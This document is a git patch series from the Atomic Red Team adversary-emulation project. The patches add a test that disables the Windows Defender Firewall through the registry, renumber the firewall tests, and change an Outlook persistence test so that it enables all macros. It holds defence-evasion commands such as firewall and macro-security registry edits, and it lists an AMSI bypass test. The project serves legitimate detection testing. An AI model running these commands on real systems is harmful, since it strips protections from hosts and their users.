profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt defense-evasion,T1562.001,Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 2c80658d..da7cfd0c 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -501,10 +501,11 @@ - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #1: Disable firewall [linux] - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #1: Disable syslog [linux] - Atomic Test #2: Disable Cb Response [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7bc31d02..5441311e 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -361,10 +361,11 @@ - Atomic Test #4: Clear Windows Audit Policy Config [windows] - [T1562.004 Disable or Modify System Firewall](../../T1562.004/T1562.004.md) - Atomic Test #2: Disable Microsoft Defender Firewall [windows] - - Atomic Test #3: Allow SMB and RDP on Microsoft Defender Firewall [windows] - - Atomic Test #4: Opening ports for proxy - HARDRAIN [windows] - - Atomic Test #5: Open a local port through Windows Firewall to any profile [windows] - - Atomic Test #6: Allow Executable Through Firewall Located in Non-Standard Location [windows] + - Atomic Test #3: Disable Microsoft Defender Firewall via Registry [windows] + - Atomic Test #4: Allow SMB and RDP on Microsoft Defender Firewall [windows] + - Atomic Test #5: Opening ports for proxy - HARDRAIN [windows] + - Atomic Test #6: Open a local port through Windows Firewall to any profile [windows] + - Atomic Test #7: Allow Executable Through Firewall Located in Non-Standard Location [windows] - [T1562.001 Disable or Modify Tools](../../T1562.001/T1562.001.md) - Atomic Test #10: Unload Sysmon Filter Driver [windows] - Atomic Test #11: Uninstall Sysmon [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3e83219d..e4882d57 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -22379,6 +22379,23 @@ defense-evasion: ' cleanup_command: 'netsh advfirewall set currentprofile state on >nul 2>&1 +' + name: command_prompt + - name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 0 /f + +' + cleanup_command: 'reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" + /v "EnableFirewall" /t REG_DWORD /d 1 /f + ' name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall diff --git a/atomics/T1562.004/T1562.004.md b/atomics/T1562.004/T1562.004.md index ea17f6a6..3c2b9eea 100644 --- a/atomics/T1562.004/T1562.004.md +++ b/atomics/T1562.004/T1562.004.md @@ -10,13 +10,15 @@ Modifying or disabling a system firewall may enable adversary C2 communications, - [Atomic Test #2 - Disable Microsoft Defender Firewall](#atomic-test-2---disable-microsoft-defender-firewall) -- [Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall) +- [Atomic Test #3 - Disable Microsoft Defender Firewall via Registry](#atomic-test-3---disable-microsoft-defender-firewall-via-registry) -- [Atomic Test #4 - Opening ports for proxy - HARDRAIN](#atomic-test-4---opening-ports-for-proxy---hardrain) +- [Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall](#atomic-test-4---allow-smb-and-rdp-on-microsoft-defender-firewall) -- [Atomic Test #5 - Open a local port through Windows Firewall to any profile](#atomic-test-5---open-a-local-port-through-windows-firewall-to-any-profile) +- [Atomic Test #5 - Opening ports for proxy - HARDRAIN](#atomic-test-5---opening-ports-for-proxy---hardrain) -- [Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-6---allow-executable-through-firewall-located-in-non-standard-location) +- [Atomic Test #6 - Open a local port through Windows Firewall to any profile](#atomic-test-6---open-a-local-port-through-windows-firewall-to-any-profile) + +- [Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location](#atomic-test-7---allow-executable-through-firewall-located-in-non-standard-location)
@@ -84,7 +86,36 @@ netsh advfirewall set currentprofile state on >nul 2>&1

-## Atomic Test #3 - Allow SMB and RDP on Microsoft Defender Firewall +## Atomic Test #3 - Disable Microsoft Defender Firewall via Registry +Disables the Microsoft Defender Firewall for the public profile via registry +Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + +**Supported Platforms:** Windows + + + + + +#### Attack Commands: Run with `command_prompt`! + + +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f +``` + + + + + +
+
+ +## Atomic Test #4 - Allow SMB and RDP on Microsoft Defender Firewall Allow all SMB and RDP rules on the Microsoft Defender Firewall for all profiles. Caution if you access remotely the host where the test runs! Especially with the cleanup command which will reset the firewall and risk disabling those services... @@ -114,7 +145,7 @@ netsh advfirewall reset >nul 2>&1

-## Atomic Test #4 - Opening ports for proxy - HARDRAIN +## Atomic Test #5 - Opening ports for proxy - HARDRAIN This test creates a listening interface on a victim device. This tactic was used by HARDRAIN for proxying. reference: https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf @@ -144,7 +175,7 @@ netsh advfirewall firewall delete rule name="atomic testing" protocol=TCP localp

-## Atomic Test #5 - Open a local port through Windows Firewall to any profile +## Atomic Test #6 - Open a local port through Windows Firewall to any profile This test will attempt to open a local port defined by input arguments to any profile **Supported Platforms:** Windows @@ -177,7 +208,7 @@ netsh advfirewall firewall delete rule name="Open Port to Any" | Out-Null

-## Atomic Test #6 - Allow Executable Through Firewall Located in Non-Standard Location +## Atomic Test #7 - Allow Executable Through Firewall Located in Non-Standard Location This test will attempt to allow an executable through the system firewall located in the Users directory **Supported Platforms:** Windows From 799ea20a954ce926d8f23d06c507d213ccfa7aca Mon Sep 17 00:00:00 2001 From: BaffledJimmy Date: Wed, 16 Jun 2021 05:39:17 +0100 Subject: [PATCH 34/35] Amend regkey path for Macro security level (#1515) * Amend regkey path for Macro security level As shown in this image - https://www.mdsec.co.uk/wp-content/uploads/2020/11/image-2-768x191.png.webp - the correct regkey is \Level\. The existing ```reg add``` syntax will not create a Level value with a DWORD of 4 (disable all). Also changed the regkey to 1 (enable all macros without notif). ``` 4 = Disable all macros without notification 3 = Notifications for digitally signed macros, all other macros disabled 2 = Notifications for all macros 1 = Enable all Macros ``` * Update T1137.yaml * Update T1137.md --- atomics/T1137/T1137.md | 21 +++++++++++++++------ atomics/T1137/T1137.yaml | 4 ++-- 2 files changed, 17 insertions(+), 8 deletions(-) diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index a7660ba0..2a8fa0fc 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,11 +12,20 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 + As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. -Too achieve this two things must happened on the syste +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. +To achieve this two things must happen on the system: - The macro security registry value must be set to '4' -- A file called VbaProject.OTM must be created in the Outlook Folder. +- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. + +Note: There are a variety of options possible for the Macro security setting. These are: +``` +4 = Disable all macros without notification +3 = Notifications for digitally signed macros, all other macros disabled +2 = Notifications for all macros +1 = Enable all Macros +``` **Supported Platforms:** Windows @@ -28,14 +37,14 @@ Too achieve this two things must happened on the syste ```cmd -reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f +reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` #### Cleanup Commands: ```cmd -reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f +reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM ``` diff --git a/atomics/T1137/T1137.yaml b/atomics/T1137/T1137.yaml index 138d40bc..238f7a5b 100644 --- a/atomics/T1137/T1137.yaml +++ b/atomics/T1137/T1137.yaml @@ -13,10 +13,10 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt From c7125ac30715087aadf46545f9d5bd377402fbe8 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Wed, 16 Jun 2021 04:39:47 +0000 Subject: [PATCH 35/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1137/T1137.md | 17 ++++------------- 2 files changed, 6 insertions(+), 15 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index e4882d57..9d315073 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -42012,11 +42012,11 @@ persistence: - windows executor: command: | - reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /t REG_DWORD /d 4 /f + reg add "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /t REG_DWORD /d 1 /f mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1 echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM cleanup_command: | - reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security" /f + reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f del %APPDATA%\Microsoft\Outlook\VbaProject.OTM name: command_prompt T1137.001: diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index 2a8fa0fc..50c9c974 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -2,7 +2,7 @@ ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1137)
Adversaries may leverage Microsoft Office-based applications for persistence between startups. Microsoft Office is a fairly common application suite on Windows-based operating systems within an enterprise network. There are multiple mechanisms that can be used with Office for persistence when an Office-based application is started; this can include the use of Office Template Macros and add-ins. -A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, macros and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules)
+A variety of features have been discovered in Outlook that can be abused to obtain persistence, such as Outlook rules, forms, and Home Page.(Citation: SensePost Ruler GitHub) These persistence mechanisms can work within Outlook or be used through Office 365.(Citation: TechNet O365 Outlook Rules) ## Atomic Tests @@ -12,20 +12,11 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ -it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands in the user context. This transform Outlook into a C2 execution method. -To achieve this two things must happen on the system: +it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. +Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' -- A correctly formatted file called VbaProject.OTM must be created in the Outlook Folder. - -Note: There are a variety of options possible for the Macro security setting. These are: -``` -4 = Disable all macros without notification -3 = Notifications for digitally signed macros, all other macros disabled -2 = Notifications for all macros -1 = Enable all Macros -``` +- A file called VbaProject.OTM must be created in the Outlook Folder. **Supported Platforms:** Windows